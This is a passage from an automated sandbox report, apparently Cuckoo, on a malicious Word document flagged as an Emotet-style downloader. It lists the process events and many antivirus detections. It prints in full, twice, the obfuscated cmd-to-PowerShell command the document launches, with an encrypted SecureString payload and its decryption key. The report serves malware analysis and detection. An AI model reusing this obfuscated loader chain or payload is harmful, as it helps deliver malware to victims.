235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
One or more non-safelisted processes were created (2 events)
parent_process winword.exe martian_process cmd apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
parent_process winword.exe martian_process "C:\Windows\System32\cmd.exe" apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('76492d1116743f0423413b16050a5345MgB8AHoARABQAEkARgBZAEIAawBmAGcARgBLAFYAawB1AHIAcwBPAFMAWgBRAEEAPQA9AHwAZAAzADUAYwBhADEAMgAxAGYAYgA1AGQAZAA4ADkAOQAzADgAYgBhAGYAZQBlADUAOQBiAGYAZgA0AGQAMQAyAGEAMgA0ADMAMQAwADcAZAA2ADAAYwBlAGIAMwAxAGQAOAAxAGEAOQAxAGEAZgAxADYANAA2ADMAYQA5AGQAZAAzADkAZgAxADUAMAA2ADQANQA2ADYANQA4AGQAZAA4ADkAZQBlAGMANgBmADYAYQA1AGIAOAA0AGMAMABlAGMANQA0ADAAZQAxADkAOABjADUAZgA5AGQANgBmADEANgAxADgAOAA4AGMAYwBlAGMANQA4ADcAOQBiAGUAZgAzADkANQA3ADkAMABkAGMAMAA1ADgAZABhAGIAOAAwAGUAZAAxADMANAAzADgANwAzADcANAA3AGMAZQA2AGYAMQBiADAAOABiADIAMgAzADgAYQA3ADcANAA5AGUAMwBiADYANABjAGUAYwAwADkAZAA1ADEAMAA3AGIAZABhAGMAYwA4ADUAZAAyADkAZgA3ADQANQBmAGYAMQBmAGYAOQAzAGYAYgAxADAAMQAxADUAMQBmADUAMgA0AGYAMAA5ADUAYQAxAGYAZAA5ADMANABjADkAOQBhADEANgA2AGMANQA3ADcAZQA0ADcAMgAxADEANAAyADcAZgA1AGYAZgA2AGMAOQBjAGEAYQAyAGEAZQBjADgANgBkADYAMwAzAGEAZQBhADcAMgBlADgAYgAxADUAZQA5ADAAMgA2ADIANgBiADIAMwBiADQAYQA2AGMANABjADAAZQBjADgANQAwADQANgBmADEAOAAxADcAMAAxAGEAMgAwAGEAZgA2ADgAOQBkADAAMQA4ADYANABhADQANgBhAGYAMABmAGEAZAAxAGQAMgA2ADAAZABlADAANgBkAGQAOQBiADMAMwBkADkANABlADIAZAAzAGIAZABjADAAYwAyADYAYQBlADgAYwBjAGEAMAAwADQAYwBlAGUAMwAwAGEAYgAwAGUAMQA4AGIAMQBlADYAZAA4AGYANwAwADAAOAA1AGUAMQAyADUAZAAyADIAOAA4ADMAMgAxAGYAMwAyADgAYgA5ADAANABmADIAZQAxADgAZgA1AGUAYwA2AGUAOAA1ADgAYwAyADUAOQAwADQAZAAwADUAYQAyADUAYQBkAGIAZgA1AGEANQBjAGQANAA1ADgAZQBlAGIANwA3ADMAMQA5AGQAMQA1AGYAZAAxADIAYwBmAGIAMgA2ADAAZgAwAGYAYQAxADUANgA2ADQAOAA2ADQAMABmADAANgA5AGEAOAAxAGMAZAAzADcAYgBlAGYAYwA3AGYANQA1ADgAOQA5ADUAYQAxADcAYwA4AGMAYQA3AGEAMgBjAGIANQBmAGEAOABmADQAYwBmADAAZgA0ADMAMAA5ADIANQBiADUAZABlAGYAMgBkADgAZgA4AGUAMwBmADgAYgBhADEAYgAyADgAMAA3AGEAMwA1ADIAZgA1ADIAMAAwAGQANgA2ADgAYgBhAGYANAAwADMAYQBlADYANwA4ADgAYQA1ADMANQA2ADkAYwAxADUAZABkADQAMgA5ADkAMAA4ADgAOABiADUAOAAzAGIANAAyADcANwBkADcAYgAwADMAMABiAGYAYwAwADkAZgA3ADgAZQAwADEANQA5AGIAZQBjAGEAOQA2AGEAYwA0ADUAYQBlAGUANQAzAGQAYwA3ADkAOQAzADEANAA0AGYAMAA0ADYAYwAxAGMAMgA3ADMANwBmADMAYQA5ADYAMwA0ADkAMwA5AGEAMQA3ADMAYQBlAGYAZQAyADUAYwBkADIANwA4ADQAYgBmADYAZABmADMAOQBmADIAOQAzADQAYwA0AGMAYgBjAGMAOAA1ADEAYgA3ADQAYQAzAGIAYgAzADkAZQA0ADkAOQBiAGIAYQA0AGMAMgBmADAAYgBhAGMAOQA2ADQAZABiADEAMgA2ADkAOAAyADAAYQA1ADAAYQBmADIAMwBiADIAZQBiAGEAYwA3ADIANAA0AGIAZgA1ADgANgBmADUANgAxADQAMgA5ADcAYwBkADUAZgAyADAAYQA1AGYANQBiAGUAMQAwADgAOABmADcANwBiADEAMwBkAGUANgBkADgAMAA2AGIAYQA1ADUAZQAwADMAZQBmADkAZAAwAGQANwA4AGYANgA5ADkAYwBlADYAOAA0ADUANQA4ADcANwBhAGEAMQA5AGYAMQAxADAAOQBjADkAYwA5AGEAOQA2ADcAMwA0ADUAZgBlAGIAOABjADAANgBmADcAZQA1ADgAMABmADgAOQAxAGYAMgBhADcANwBmADcANgA1ADYAYwAzADIAZgA0AGMAOAA0AGMAYwA4ADYAZABjADMAZQAxAGUAMAAyADIAYgAwADQAZAA3ADAAYgBhADcANAA2ADEAMABjADYAYwA3ADAANAA2ADQAYwBhADMAMAA0AGEANwBmAGEAYQBkADMAMQBkADUAZAAyAGEAMwBiADQAOQBiAGMAOQBkADkAYwA5ADQANwA2AGUAZQBhADIAOQBhADYANwBhAGMAYQAxADcAMABmADcAZgAyAGMAMQA3AGYAMwAxADkAZAA0AGEAYwAxADgAMgAxAGMAZQA5ADIAYwA3ADkANgBhADUAOAAwAGQANwBkADIAZQAzAGEANgBhADUANgAxADkAZgBkADQAOAA2ADEAMABlADYANwBhAGEANwBiADQAOQBhADEANwA5ADQANgA1AGUAZQBjAGQAYgBjADIAMABkAGEAZQBjAGIANgBmADkAMwA0ADQAZABjADEAZQA3ADMAOQBiAGUAMgBlADIANwA4ADkAZQA4ADQAMwAzADYAMQA5ADkAZQA5AGUAZQA5AGYAZQBkADMAOAA4AGMAMABhADYAYQBhAGEAYwAyADgAYgAwADQAMABkAGYANgA1AGUAMABkADkAMAA5AGUAYQBkAGMAOAAzADQAMwA2AGIANQA4AGIAMgBjADIAZgAyADMAMAA0ADMAMQBlAGQANQBlADQAZgAyADkAOQAzADEAZQBhADUANgBjAGEAYQAyAGEAYQAzAGEAMAA2AGEANwBkADIANQBjAGEAYgA0AGMAOABmAGIAYwA4ADQAMgBiADEAMgBkAGQANwA5ADAAYgA1ADMAMgBkAGQAYwAyAGQAMwA2ADMAMQBkAGUAMwBmADcAZABhADMANgA4AGMAZgA2ADMAMgBkADYAZgAzAGEAMgBjAGUANwA3ADIAMgBjADEAYQAwAGQAOQBjADEAMQA4ADYAOQBlADMANAA2AGYANwA4ADkANwBhADMAYgAzAGUAZABjADkAYwAwADUAMAA5ADgAMwAyADUAZgA0ADYANABhADYAYgAxAGEAYwAzADAAYwBmADQAZgBmADMAMABlADkANgA4ADkANABiAGUANABmADcAMwAwADAAMQBhADEAOAA5AGYAOQAwAGUAMAAxADkAMgA2ADEANAA3ADQANQAwADAANABlADYAYQBlADUANAA1ADQAZgA2AGYANwAxADYAMgA3AGEAOQA5ADEANgBhAGIAYQAzAGYAMwBiADIAMwA4ADkAYQBlAGMAMQA0ADEAYwA2AGQANgBiADkAMwA0ADkAZQA0ADEAMwA2ADcANAA2ADcAZAA3ADYAMgA4ADQAYQAyAGIANwAxAGQAMwA4ADMAMgA1AGUAZQBhADMAZAA0AGEAYgA4AGIAMwAxAGMAYwAwADMAMgBkADUAMQBlADUANwA2AGUAMwA0ADQANgBhADYAZABmADQANAA2ADUAYwBlADkANgBjAGIAOQBhADAAYwA3ADIAMQBhAGIAZAA2ADAANQA2AGQAZQAwAGIAYgAyADEANwAxAGMANQBkADUAMABiAGYAZgAyADgAMQBlADIAYwBkADEAYgA2AGMANABkAGEANwBjAGYAZABiADcAMQAzADUANgAyADEAMgAzADIANwA5ADIAOQA3AGUAYwBjADYAYwAwAGUAMwAwADQAMgBmADQANwA1ADMAYgA4AGIAOAAxADgAYQAyAGUANwAxADMAOQBkAGEANwAyAGIAMwA5ADkAMwA4ADcAOQA4AGMAMAA1AGIAOQAxADQAMQAxADQANQBkAGEAOQAzADcAMAA0AA==' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
The process winword.exe wrote an executable file to disk which it then attempted to execute (1 event)
file C:\Windows\System32\cmd.exe
File has been identified by 15 AntiVirus engine on IRMA as malicious (15 events)
G Data Antivirus (Windows) Virus: VB.Heur.EmoDldr.4.F649EAB6.Gen (Engine A)
Avast Core Security (Linux) Script:SNH-gen [Drp]
C4S ClamAV (Linux) Doc.Dropper.Agent-6474259-0
F-Secure Antivirus (Linux) Trojan:W97M/AutorunMacro.D [FSE]
Sophos Anti-Virus (Linux) Troj/DocDl-NAR
eScan Antivirus (Linux) VB.Heur.EmoDldr.4.F649EAB6.Gen(DB)
ESET Security (Windows) VBA/TrojanDownloader.Agent.HGD trojan
McAfee CLI scanner (Linux) Downloader-FBOU
DrWeb Antivirus (Linux) Exploit.Siggen3.19591
Trend Micro SProtect (Linux) W2KM_POWLOAD.AOECV
WithSecure (Linux) Trojan:W97M/AutorunMacro.D
ClamAV (Linux) Doc.Dropper.Agent-6474259-0
Bitdefender Antivirus (Linux) VB.Heur.EmoDldr.4.F649EAB6.Gen
Kaspersky Standard (Windows) Trojan-Downloader.MSWord.Agent.bxu
Emsisoft Commandline Scanner (Windows) VB.Heur.EmoDldr.4.F649EAB6.Gen (B)
File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)
Lionic Trojan.MSWord.Agent.a!c
MicroWorld-eScan VB:Trojan.Valyria.1391
CAT-QuickHeal W97M.Emotet.Heur
McAfee RDN/GenDownloader.avo
ALYac Trojan.Downloader.VBA.gen
Sangfor Malware
K7AntiVirus Trojan ( 00536d111 )
K7GW Trojan ( 00536d111 )
Baidu VBA.Trojan-Downloader.Agent.cpf
Cyren W97M/Agent
TrendMicro-HouseCall W2KM_POWLOAD.AOECV
Avast Other:Malware-gen [Trj]
ClamAV Doc.Dropper.Agent-6474259-0
Kaspersky Trojan-Downloader.MSWord.Agent.bxu
BitDefender VB:Trojan.Valyria.1391
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Rising Downloader.Donoff!8.36C (TOPIS:E0:ktvwH8uWY3)
Endgame malicious (high confidence)
Emsisoft VB:Trojan.Valyria.1391 (B)
Comodo Malware@#1fyiqszs4pd25
F-Secure Trojan:W97M/AutorunMacro.D
TrendMicro W2KM_POWLOAD.AOECV
McAfee-GW-Edition BehavesLike.Dropper.cg
FireEye VB:Trojan.Valyria.1391
Sophos Troj/DocDl-NAR
Ikarus Trojan-Downloader.VBA.Agent
F-Prot New or modified W97M/Agent
Avira W97M/Agent.05668317
MAX malware (ai score=97)
Antiy-AVL Trojan[Downloader]/MSOffice.Agent.hgd
Microsoft TrojanDownloader:O97M/Donoff.RB
Arcabit HEUR.VBA.Trojan.e
AhnLab-V3 VBA/Downloader
ZoneAlarm Trojan-Downloader.MSWord.Agent.bxu
GData VB:Trojan.Valyria.1391
AVG Other:Malware-gen [Trj]
ESET-NOD32 VBA/TrojanDownloader.Agent.HGD
TACHYON Suspicious/W97M.Obfus.Gen.3
Ad-Aware VB:Trojan.Valyria.1391
Zoner Probably W97Obfuscated
Tencent OLE.Win32.Macro.703912
SentinelOne DFI - Malicious OLE
Fortinet VBA/Agent.HHV!tr
Qihoo-360 virus.office.qexvmc.1065
Screenshots
Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action VT Location
No hosts contacted.
Cuckoo

We're processing your submission... This could take a few seconds.